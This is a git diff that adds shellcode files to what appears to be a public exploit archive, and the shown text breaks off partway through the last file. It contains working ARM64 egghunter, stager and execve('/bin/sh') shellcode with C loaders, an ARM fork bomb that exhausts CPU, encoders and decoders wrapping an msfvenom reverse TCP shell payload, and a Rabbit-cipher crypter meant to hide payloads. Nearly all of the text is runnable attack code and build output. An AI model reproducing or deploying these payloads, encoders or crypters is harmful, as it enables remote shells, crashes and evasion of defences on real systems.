+    bge  jump_search_page       // If x10 was over x13, search next valid page.
+    sub  x10, x10, x2           // x10 = x10 - 7. This instruction is for search memory address 1 byte by 1 byte.
+    b    next_address           // Check next memory address.
+
+search_page:
+    // mprotect(*buf, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC)
+    add  x0, x10, xzr           // args[0] = x0 = x10 + xzr = x10
+    svc  #0x1337                // Invoke mprotect().
+    tbz  x0, #63, hunt          // If return value is positive, jump to hunt label location.
+    add  x10, x10, x1           // Next page address = x10 + x1 = x10 + 0x1000
+    b    search_page            // Check next page address.
+ubuntu@ubuntu:~/works$ as -o egghunter.o egghunter.s && ld -o egghunter egghunter.o
+ubuntu@ubuntu:~/works$ objdump -d ./egghunter
+
+./egghunter:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d2801c48 	mov	x8, #0xe2                  	// #226
+  40007c:	d345fd02 	lsr	x2, x8, #5
+  400080:	913fe441 	add	x1, x2, #0xff9
+  400084:	aa1f03ea 	mov	x10, xzr
+  400088:	d28aea0b 	mov	x11, #0x5750                	// #22352
+  40008c:	f2a429cb 	movk	x11, #0x214e, lsl #16
+  400090:	8b0b816b 	add	x11, x11, x11, lsl #32
+
+0000000000400094 <jump_search_page>:
+  400094:	b6f80148 	tbz	x8, #63, 4000bc <search_page>
+
+0000000000400098 <jump_shellcode>:
+  400098:	d61f0140 	br	x10
+
+000000000040009c <hunt>:
+  40009c:	8b01014d 	add	x13, x10, x1
+
+00000000004000a0 <next_address>:
+  4000a0:	f840854c 	ldr	x12, [x10],#8
+  4000a4:	eb0c017f 	cmp	x11, x12
+  4000a8:	54ffff80 	b.eq	400098 <jump_shellcode>
+  4000ac:	eb0d015f 	cmp	x10, x13
+  4000b0:	54ffff2a 	b.ge	400094 <jump_search_page>
+  4000b4:	cb02014a 	sub	x10, x10, x2
+  4000b8:	17fffffa 	b	4000a0 <next_address>
+
+00000000004000bc <search_page>:
+  4000bc:	8b1f0140 	add	x0, x10, xzr
+  4000c0:	d40266e1 	svc	#0x1337
+  4000c4:	b6fffec0 	tbz	x0, #63, 40009c <hunt>
+  4000c8:	8b01014a 	add	x10, x10, x1
+  4000cc:	17fffffc 	b	4000bc <search_page>
+ubuntu@ubuntu:~/works$ objcopy -O binary egghunter egghunter.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' egghunter.bin && echo
+\x48\x1c\x80\xd2\x02\xfd\x45\xd3\x41\xe4\x3f\x91\xea\x03\x1f\xaa\x0b\xea\x8a\xd2\xcb\x29\xa4\xf2\x6b\x81\x0b\x8b\x48\x01\xf8\xb6\x40\x01\x1f\xd6\x4d\x01\x01\x8b\x4c\x85\x40\xf8\x7f\x01\x0c\xeb\x80\xff\xff\x54\x5f\x01\x0d\xeb\x2a\xff\xff\x54\x4a\x01\x02\xcb\xfa\xff\xff\x17\x40\x01\x1f\x8b\xe1\x66\x02\xd4\xc0\xfe\xff\xb6\x4a\x01\x01\x8b\xfc\xff\xff\x17
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char stager[] =
+"\x48\x1c\x80\xd2\x02\xfd\x45\xd3\x41\xe4\x3f\x91\xea\x03\x1f\xaa"
+"\x0b\xea\x8a\xd2\xcb\x29\xa4\xf2\x6b\x81\x0b\x8b\x48\x01\xf8\xb6"
+"\x40\x01\x1f\xd6\x4d\x01\x01\x8b\x4c\x85\x40\xf8\x7f\x01\x0c\xeb"
+"\x80\xff\xff\x54\x5f\x01\x0d\xeb\x2a\xff\xff\x54\x4a\x01\x02\xcb"
+"\xfa\xff\xff\x17\x40\x01\x1f\x8b\xe1\x66\x02\xd4\xc0\xfe\xff\xb6"
+"\x4a\x01\x01\x8b\xfc\xff\xff\x17";
+
+// Linux/ARM64 - execve("/bin/sh", NULL, NULL) Shellcode (40 Bytes)
+char shell[] =
+"PWN!PWN!"
+"\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2"
+"\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\xe0\x63\x21\x8b"
+"\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(stager));
+
+    void *ptr1 = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr1 == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    void *ptr2 = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr2 == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr1, stager, sizeof(stager));
+    memcpy(ptr2, shell, sizeof(shell));
+    sc = ptr1;
+
+    sc();
+
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/arm/47055.c b/shellcodes/arm/47055.c
new file mode 100644
index 000000000..72231e173
--- /dev/null
+++ b/shellcodes/arm/47055.c
@@ -0,0 +1,102 @@
+/*
+# Title:  Linux/ARM64 - mmap() + read() stager + execve("/bin/sh", NULL, NULL) Shellcode (60 Bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat stager.s
+.section .text
+.global _start
+_start:
+    // *ret = mmap(0, 0x1000, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0)
+    mov  x8, #222             // Systemcall Number = 222 (mmap)
+    mov  x0, xzr              // args[0] = 0x0
+    mov  x3, 0x22             // args[3] = 0x22
+    mvn  x4, xzr              // args[4] = -1 (0xffffffffffffffff)
+    mov  x5, xzr              // args[5] = 0x0
+    lsr  x2, x4, #61          // args[2] = 0x7
+    add  x1, x2, #0xFF9       // args[1] = 0x1000
+    svc  #0x1337              // Invoke Systemcall
+    //read(0, *ret, 0x1000)
+    mov  x2, x1               // args[2] = 0x1000 
+    add  x1, x0, xzr, lsl #12 // args[1] = *ret
+    mov  x10, x1              // save *ret to x10
+    mov  x0, xzr              // args[0] = 0x0
+    mov  x8, #63              // Systemcall Number = 63 (read)
+    svc  #0x1337              // Invoke Systemcall
+    br   x10                  // Jump to loaded shellcode
+ubuntu@ubuntu:~/works$ as -o stager.o stager.s && ld -o stager stager.o
+ubuntu@ubuntu:~/works$ objdump -d ./stager
+
+./stager:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d2801bc8 	mov	x8, #0xde                  	// #222
+  40007c:	aa1f03e0 	mov	x0, xzr
+  400080:	d2800443 	mov	x3, #0x22                  	// #34
+  400084:	aa3f03e4 	mvn	x4, xzr
+  400088:	aa1f03e5 	mov	x5, xzr
+  40008c:	d37dfc82 	lsr	x2, x4, #61
+  400090:	913fe441 	add	x1, x2, #0xff9
+  400094:	d40266e1 	svc	#0x1337
+  400098:	aa0103e2 	mov	x2, x1
+  40009c:	8b1f3001 	add	x1, x0, xzr, lsl #12
+  4000a0:	aa0103ea 	mov	x10, x1
+  4000a4:	aa1f03e0 	mov	x0, xzr
+  4000a8:	d28007e8 	mov	x8, #0x3f                  	// #63
+  4000ac:	d40266e1 	svc	#0x1337
+  4000b0:	d61f0140 	br	x10
+ubuntu@ubuntu:~/works$ (echo -en "\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4"; cat) | ./stager
+id
+uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),107(netdev)
+exit
+
+ubuntu@ubuntu:~/works$ objcopy -O binary stager stager.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' stager.bin && echo
+\xc8\x1b\x80\xd2\xe0\x03\x1f\xaa\x43\x04\x80\xd2\xe4\x03\x3f\xaa\xe5\x03\x1f\xaa\x82\xfc\x7d\xd3\x41\xe4\x3f\x91\xe1\x66\x02\xd4\xe2\x03\x01\xaa\x01\x30\x1f\x8b\xea\x03\x01\xaa\xe0\x03\x1f\xaa\xe8\x07\x80\xd2\xe1\x66\x02\xd4\x40\x01\x1f\xd6
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\xc8\x1b\x80\xd2\xe0\x03\x1f\xaa\x43\x04\x80\xd2\xe4\x03\x3f\xaa"
+"\xe5\x03\x1f\xaa\x82\xfc\x7d\xd3\x41\xe4\x3f\x91\xe1\x66\x02\xd4"
+"\xe2\x03\x01\xaa\x01\x30\x1f\x8b\xea\x03\x01\xaa\xe0\x03\x1f\xaa"
+"\xe8\x07\x80\xd2\xe1\x66\x02\xd4\x40\x01\x1f\xd6";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/arm/47056.c b/shellcodes/arm/47056.c
new file mode 100644
index 000000000..0daf6e3fa
--- /dev/null
+++ b/shellcodes/arm/47056.c
@@ -0,0 +1,78 @@
+/*
+# Title:  Linux/ARM64 - Jump Back Shellcode + execve("/bin/sh", NULL, NULL) Shellcode (8 Bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat jumpback.s
+.section .text
+.global _start
+_start:
+    // Jump back to _start-0x30
+    adr  x10, .-0x30    // x10 = _start-0x30
+    br   x10            // Jump to _start-0x30
+ubuntu@ubuntu:~/works$ as -o jumpback.o jumpback.s && ld -o jumpback jumpback.o
+ubuntu@ubuntu:~/works$ objdump -d ./jumpback
+
+./jumpback:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	10fffe8a 	adr	x10, 400048 <_start-0x30>
+  40007c:	d61f0140 	br	x10
+ubuntu@ubuntu:~/works$ objcopy -O binary jumpback jumpback.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' jumpback.bin && echo
+\x8a\xfe\xff\x10\x40\x01\x1f\xd6
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+// Linux/ARM64 - execve("/bin/sh", NULL, NULL) Shellcode (40 Bytes)
+char shell[] =
+"\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2"
+"\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\xe0\x63\x21\x8b"
+"\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";
+
+char jumpback[] =
+"\x8a\xfe\xff\x10\x40\x01\x1f\xd6";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(jumpback));
+
+    void *ptr1 = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+    void *ptr2;
+
+    if (ptr1 == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    ptr2 = ptr1 + 0x30;
+
+    memcpy(ptr1, shell, sizeof(shell));
+    memcpy(ptr2, jumpback, sizeof(jumpback));
+
+    sc = ptr2;
+
+    sc();
+
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/arm/47057.c b/shellcodes/arm/47057.c
new file mode 100644
index 000000000..5873094d3
--- /dev/null
+++ b/shellcodes/arm/47057.c
@@ -0,0 +1,89 @@
+/*
+# Title:  Linux/ARM64 - execve("/bin/sh", ["/bin/sh"], NULL) Shellcode (48 Bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat execve2.s
+.section .text
+.global _start
+_start:
+    // execve("/bin/sh", ["/bin/sh"], NULL)
+    mov  x1, #0x622F            // x1 = 0x000000000000622F ("b/")
+    movk x1, #0x6E69, lsl #16   // x1 = 0x000000006E69622F ("nib/")
+    movk x1, #0x732F, lsl #32   // x1 = 0x0000732F6E69622F ("s/nib/")
+    movk x1, #0x68, lsl #48     // x1 = 0x0068732F6E69622F ("hs/nib/")
+    str  x1, [sp, #-8]!         // push x1
+    mov  x2, xzr                // args[2] = x2 = NULL
+    add  x0, sp, x2             // args[0] = x0 = pointer to "/bin/sh\0"
+    str  x2, [sp, #-8]!         // push x2
+    str  x0, [sp, #-8]!         // push x0
+    add  x1, sp, x2             // args[1] = x1 = ["/bin/sh", NULL]
+    mov  x8, #221               // Systemcall Number = 221 (execve)
+    svc  #0x1337                // Invoke Systemcall
+ubuntu@ubuntu:~/works$ as -o execve2.o execve2.s && ld -o execve2 execve2.o
+ubuntu@ubuntu:~/works$ objdump -d ./execve2
+
+./execve2:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d28c45e1 	mov	x1, #0x622f                	// #25135
+  40007c:	f2adcd21 	movk	x1, #0x6e69, lsl #16
+  400080:	f2ce65e1 	movk	x1, #0x732f, lsl #32
+  400084:	f2e00d01 	movk	x1, #0x68, lsl #48
+  400088:	f81f8fe1 	str	x1, [sp,#-8]!
+  40008c:	aa1f03e2 	mov	x2, xzr
+  400090:	8b2263e0 	add	x0, sp, x2
+  400094:	f81f8fe2 	str	x2, [sp,#-8]!
+  400098:	f81f8fe0 	str	x0, [sp,#-8]!
+  40009c:	8b2263e1 	add	x1, sp, x2
+  4000a0:	d2801ba8 	mov	x8, #0xdd                  	// #221
+  4000a4:	d40266e1 	svc	#0x1337
+ubuntu@ubuntu:~/works$ objcopy -O binary execve2 execve2.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' execve2.bin && echo
+\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2\xe1\x8f\x1f\xf8\xe2\x03\x1f\xaa\xe0\x63\x22\x8b\xe2\x8f\x1f\xf8\xe0\x8f\x1f\xf8\xe1\x63\x22\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2"
+"\xe1\x8f\x1f\xf8\xe2\x03\x1f\xaa\xe0\x63\x22\x8b\xe2\x8f\x1f\xf8"
+"\xe0\x8f\x1f\xf8\xe1\x63\x22\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/arm/47473.c b/shellcodes/arm/47473.c
new file mode 100644
index 000000000..0da058c1b
--- /dev/null
+++ b/shellcodes/arm/47473.c
@@ -0,0 +1,79 @@
+# Title:  Linux/ARM - Fork Bomb Shellcode (20 bytes)
+# Date:   2019-10-07
+# Category: Shellcode
+# Tested: armv7l (32-bit)(Raspberry Pi 2 Model B) (OS: Raspbian Buster Lite)
+# Author: CJHackerz
+# Description: This shellcode creates new processes in infinite loop to exhaust CPU resources leading to crash
+
+/*
+## Compilation instruction
+
+pi@raspberrypi:~ cat forkbomb_ARM32.s
+.text
+.global _start
+
+_start:
+	.code 32
+	ADD R3, PC, #1	//Switching to Thumb mode
+	BX R3
+
+	.code 16
+	_loop:
+		EOR R7, R7
+		MOV R7, #2	//Syscall to fork()
+		SVC #1
+		MOV R8, R8 //NOP
+		BL _loop
+
+pi@raspberrypi:~ cat Makefile
+forkbomb_ARM32:  forkbomb_ARM32.o
+	ld forkbomb_ARM32.o -o forkbomb_ARM32
+forkbomb_ARM32.o:  forkbomb_ARM32.s
+	as forkbomb_ARM32.s -o forkbomb_ARM32.o
+clean:
+	rm *.o forkbomb_ARM32
+pi@raspberrypi:~ make
+pi@raspberrypi:~ objcopy -O binary forkbomb_ARM32 forkbomb_ARM32.bin
+pi@raspberrypi:~ hexdump -v -e '"\\""x" 1/1 "%02x" ""' forkbomb_ARM32.bin && echo
+\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x7f\x40\x02\x27\x01\xdf\xc0\x46\xff\xf7\xfa\xff
+
+## Testing compiled shellcode
+pi@raspberrypi:~ file forkbomb_ARM32
+forkbomb_ARM32: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, not stripped
+pi@raspberrypi:~ strace ./forkbomb_ARM32
+execve("./forkbomb_ARM32", ["./forkbomb_ARM32"], 0x7eab36e0 ) = 0
+fork()                                  = 21975
+fork()                                  = 22000
+fork()                                  = 22016
+fork()                                  = 22044
+fork()                                  = 22087
+fork()                                  = 22125
+fork()                                  = 22162
+fork()                                  = 22199
+fork()                                  = 22242
+fork()                                  = 22287
+fork()                                  = 22326
+fork()                                  = 23343
+fork()                                  = 23501
+fork()                                  = 23539
+fork()                                  = 23606
+fork()                                  = 26670
+^Cstrace: Process 21974 detached
+
+## Steps to compile given shellcode C program file
+pi@raspberrypi:~ gcc -fno-stack-protector -z execstack forkbomb_ARM32.c -o forkbomb_ARM32-test
+
+*/
+
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char shellcode[] = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x7f\x40\x02\x27\x01\xdf\xc0\x46\xff\xf7\xfa\xff";
+main(){
+
+	printf("Shellcode Length:  %d\n", (int)strlen(shellcode));
+	int (*ret)() = (int(*)())shellcode;
+
+	ret();
+}
\ No newline at end of file
diff --git a/shellcodes/generator/46679.nasm b/shellcodes/generator/46679.nasm
new file mode 100644
index 000000000..5fdd3eea6
--- /dev/null
+++ b/shellcodes/generator/46679.nasm
@@ -0,0 +1,56 @@
+; Date: 08/04/2019
+; XANAX Encoder
+; Author: Alan Vivona
+; Description: Uses xor-add-not-add-xor sequence with a 4 byte key and writes the encoded version to stdout
+; Tested on: x86-x64 GNU/Linux
+
+global _start
+
+segment .data
+
+    keys.xor1 equ 0x29
+    keys.add1 equ 0xff
+    keys.xor2 equ 0x50
+    keys.add2 equ 0x05
+
+    payload.len equ 74 ; this can't be over 127 bytes otherwise it will produce nullbytes
+
+    ; msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp -f hex
+    payload_start: db  0x6a, 0x29, 0x58, 0x99, 0x6a, 0x02, 0x5f, 0x6a, 0x01, 0x5e, 0x0f, 0x05, 0x48, 0x97, 0x48, 0xb9, 0x02, 0x00, 0x11, 0x5c, 0x7f, 0x00, 0x00, 0x01, 0x51, 0x48, 0x89, 0xe6, 0x6a, 0x10, 0x5a, 0x6a, 0x2a, 0x58, 0x0f, 0x05, 0x6a, 0x03, 0x5e, 0x48, 0xff, 0xce, 0x6a, 0x21, 0x58, 0x0f, 0x05, 0x75, 0xf6, 0x6a, 0x3b, 0x58, 0x99, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48, 0x89, 0xe7, 0x52, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
+
+
+section .text
+
+_start:
+
+    encode_setup:
+    xor rcx, rcx
+    lea rsi, [payload_start]
+    encode:    
+        mov al, byte [rsi+rcx]
+        ; XANAX encoding (xor add not add xor)
+        xor al, keys.xor1
+        add al, keys.add1
+        not al
+        add al, keys.add2
+        xor al, keys.xor2
+        mov byte [rsi+rcx], al
+
+        inc rcx
+        cmp rcx, payload.len
+        jne encode
+
+    ; Write
+    push 0x01
+    pop rax
+    mov rdi, rax ; fd 1 = stdout
+        ; rsi = [payload_start] from the code above, no need for setting that again
+    push payload.len
+    pop rdx
+    syscall
+
+    ; Exit
+    xor rbx, rbx
+    push 0x3c
+    pop rax
+    syscall
\ No newline at end of file
diff --git a/shellcodes/generator/46680.nasm b/shellcodes/generator/46680.nasm
new file mode 100644
index 000000000..05ac3a9d0
--- /dev/null
+++ b/shellcodes/generator/46680.nasm
@@ -0,0 +1,45 @@
+; Date: 08/04/2019
+; XANAX Decoder
+; Author: Alan Vivona
+; Description: Reverts the xor-add-not-add-xor sequence using the same 4 byte key and executes the encoded payload. 
+; Tested on: x86-x64 GNU/Linux
+
+global _start
+
+section .text
+
+keys.xor1 equ 0x29
+keys.add1 equ 0xff
+keys.xor2 equ 0x50
+keys.add2 equ 0x05
+
+; xanax encoded payload
+payload.len equ 74 ; this can't be over 127 bytes otherwise it will procude nullbytes
+
+_start:
+
+    jmp encode_setup
+    ; msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp -f hex
+    ; Encoded using XANAX Encoder:
+    payload_start: db  0x92, 0x55, 0xc4, 0x05, 0x92, 0x8a, 0xdf, 0x92, 0x8d, 0xde, 0x8f, 0x89, 0xf4, 0x17, 0xf4, 0x25, 0x8a, 0x8c, 0x9d, 0xc0, 0xff, 0x8c, 0x8c, 0x8d, 0xdd, 0xf4, 0x35, 0x66, 0x92, 0x9c, 0xc2, 0x92, 0x52, 0xc4, 0x8f, 0x89, 0x92, 0x8b, 0xde, 0xf4, 0x7f, 0x4e, 0x92, 0xad, 0xc4, 0x8f, 0x89, 0xf9, 0x76, 0x92, 0xa3, 0xc4, 0x05, 0xf4, 0x23, 0xaf, 0xea, 0x95, 0xee, 0xaf, 0xfb, 0x94, 0x8c, 0xdb, 0xf4, 0x35, 0x67, 0xda, 0xd7, 0xf4, 0x35, 0x66, 0x8f, 0x89
+    
+    encode_setup:
+    xor rcx, rcx
+    lea rsi, [rel payload_start]
+    encode:    
+        mov al, byte [rsi+rcx]
+        ; XANAX encoding (xor add neg add xor)
+        xor al, keys.xor2
+        sub al, keys.add2
+        not al
+        sub al, keys.add1
+        xor al, keys.xor1
+
+        mov byte [rsi+rcx], al
+
+        inc rcx
+        cmp rcx, payload.len
+        jne encode
+
+    ; Execute payload
+    jmp rsi
\ No newline at end of file
diff --git a/shellcodes/generator/46696.py b/shellcodes/generator/46696.py
new file mode 100755
index 000000000..f6b24db11
--- /dev/null
+++ b/shellcodes/generator/46696.py
@@ -0,0 +1,99 @@
+################################################################################
+INTRO
+################################################################################
+
+# Exploit Title: MMX-PUNPCKLBW Encoder
+# Description: Payload encoder using MMX PUNPCKLBW instruction
+# Date: 13/04/2019
+# Exploit Author: Petr Javorik
+# Tested on: Linux ubuntu 3.13.0-32-generic x86
+# Shellcode length: 61
+
+################################################################################
+ENCODER
+################################################################################
+
+#!/usr/bin/env python
+
+# stack execve
+SHELLCODE = bytearray(
+    b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'
+)
+
+# Align to qword multiples
+missing_bytes = 8 - (len(SHELLCODE) % 8)
+padding = [0x90 for _ in range(missing_bytes)]
+SHELLCODE.extend(padding)
+
+# Shuffle payload
+shuffled_payload = []
+# First byte carries count of needed PUNPCKLBW loops
+loop_count = len(SHELLCODE)//8
+shuffled_payload.append(loop_count)
+for block_num in range(0, loop_count):
+    current_block = SHELLCODE[(8 * block_num) : (8 * block_num + 8)]
+    shuffled_block = [current_block[i] for i in [0, 2, 4, 6, 1, 3, 5, 7]]
+    shuffled_payload.extend(shuffled_block)
+
+# Remove trailing NOPS
+for byte in shuffled_payload[::-1]:
+    if byte == 0x90:
+        del shuffled_payload[-1]
+    else:
+        break
+
+# Print shellcode
+print('Payload length: {}'.format(len(shuffled_payload)))
+print('\\x' + '\\x'.join('{:02x}'.format(byte) for byte in shuffled_payload))
+print('0x' + ',0x'.join('{:02x}'.format(byte) for byte in shuffled_payload))
+
+################################################################################
+DECODER
+################################################################################
+
+global _start
+
+section .text
+_start:
+
+    jmp short call_decoder
+
+decoder:
+
+    pop edi
+    xor ecx, ecx
+    mov cl, [edi]
+    inc edi
+    mov esi, edi
+
+decode:
+
+    movq mm0, qword [edi]
+    movq mm1, qword [edi +4]
+    punpcklbw mm0, mm1
+    movq qword [edi], mm0
+    add edi, 0x8
+    loop decode
+    jmp esi
+
+call_decoder:
+
+    call decoder
+    EncodedShellcode: db 0x04,0x31,0x50,0x2f,0x73,0xc0,0x68,0x2f,0x68,0x68,0x62,0x6e,0xe3,0x2f,0x69,0x89,0x50,0x89,0x53,0xe1,0x0b,0xe2,0x89,0xb0,0xcd,0x80
+
+################################################################################
+TESTING
+################################################################################
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\xeb\x1c\x5f\x31\xc9\x8a\x0f\x47\x89\xfe\x0f\x6f\x07\x0f\x6f\x4f\x04\x0f\x60\xc1\x0f\x7f\x07\x83\xc7\x08\xe2\xee\xff\xe6\xe8\xdf\xff\xff\xff\x04\x31\x50\x2f\x73\xc0\x68\x2f\x68\x68\x62\x6e\xe3\x2f\x69\x89\x50\x89\x53\xe1\x0b\xe2\x89\xb0\xcd\x80";
+
+main()
+{
+    printf("Shellcode Length:  %d\n", strlen(code));
+    int (*CodeFun)() = (int(*)())code;
+    CodeFun();
+}
\ No newline at end of file
diff --git a/shellcodes/generator/46746.txt b/shellcodes/generator/46746.txt
new file mode 100644
index 000000000..1ec8e382a
--- /dev/null
+++ b/shellcodes/generator/46746.txt
@@ -0,0 +1,109 @@
+################################################################################
+# Introduction
+################################################################################
+#
+# Exploit Title: Rabbit Shellcode Crypter
+# Date: 24.4.2019
+# Exploit Author: Petr Javorik, www.mmquant.net
+# Tested on: Linux ubuntu 3.13.0-32-generic, x86
+# Description: Crypter which encrypts, decrypts and executes given shellcode
+# using Rabbit symmetric cipher
+#
+################################################################################
+# Keep in mind before use
+################################################################################
+#
+# 1. Max shellcode length 200 bytes (easily adjustable)
+# 2. You will probably have to adjust #include rabbit.c directive
+# 3. Encryption key is strictly 16 bytes
+#
+################################################################################
+# How to use
+################################################################################
+#
+# 1. Download ECRYPT rabbit library http://www.ecrypt.eu.org/stream/e2-rabbit.html
+# 2. Compile/Run $ gcc encrypt2rabbit.c -o encrypt2rabbit
+# 3. Copy encrypted shellcode to decryptAndExecute.c
+# 4. Compile $ gcc -fno-stack-protector -z execstack decryptAndExecute.c -o decryptAndExecute
+# 5. Run with encryption key $ ./decryptAndExecute someencryptkeyyy
+#
+################################################################################
+# Encryption
+################################################################################
+
+// File: encrypt2rabbit.c
+// Author: Petr Javorik
+
+#include <string.h>
+#include <stdio.h>
+#include "../rabbit/code/rabbit.c"
+
+// execve /bin/ls
+unsigned char code[] = \
+"\x31\xc0\x50\x68\x2f\x2f\x6c\x73\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
+char key[16] = {'s', 'o', 'm', 'e', 'e', 'n', 'c', 'r', 'y', 'p', 't', 'k', 'e', 'y', 'y', 'y'};
+
+
+int main()
+{
+    ECRYPT_init();
+    ECRYPT_ctx ctx;
+    ECRYPT_keysetup(&ctx, key, 128, 0);
+    u8 encrypted[200];
+    int codeLen = strlen(code);
+    ECRYPT_process_bytes(0, &ctx, code, encrypted, codeLen);
+
+    int i;
+    printf("Encryption Key = ");
